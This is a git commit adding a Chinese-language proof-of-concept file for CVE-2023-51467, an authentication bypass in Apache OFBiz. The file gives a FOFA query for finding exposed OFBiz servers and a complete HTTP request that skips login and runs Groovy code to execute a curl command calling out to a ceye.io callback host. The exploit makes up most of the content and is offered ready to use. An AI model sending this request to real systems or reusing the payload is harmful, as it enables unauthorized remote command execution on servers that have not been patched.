Create Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md

2025-02-27 04:39:25 +00:00 · 2023-12-29 18:31:42 +08:00 · 2023-12-29 18:31:42 +08:00 · 37308e1a53
commit 37308e1a53
parent ba4e33c87d
1 changed files with 41 additions and 0 deletions
--- a/(CVE-2023-51467).md
+++ b/(CVE-2023-51467).md
@ -0,0 +1,41 @@
+## Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
+
+ Apache OFBiz 在后台提供了执行groovy 代码的功能，但是由于存在认证绕过问题，攻击者可构造恶意请求绕过身份认证，利用后台相关接口功能执行groovy代码，执行任意命令，控制服务器。
+
+
+## fofa
+```
+app="Apache_OFBiz"
+```
+
+## poc
+```
+POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+Host: 127.0.0.1:8443
+Cookie: OFBiz.Visitor=10100
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Referer: https://127.0.0.1:8443/accounting/control/main
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 166
+Origin: https://127.0.0.1:8443
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29
+```
+
+
+![c930c2bb7200a1868dad8c9d1e58cf38](https://github.com/wy876/POC/assets/139549762/b516c218-f05a-45f9-974e-be96acd0a93c)
+
+## 漏洞来源
+- https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/
+- https://mp.weixin.qq.com/s/A0pwnvbJ44mlm3E1JoFVBA
+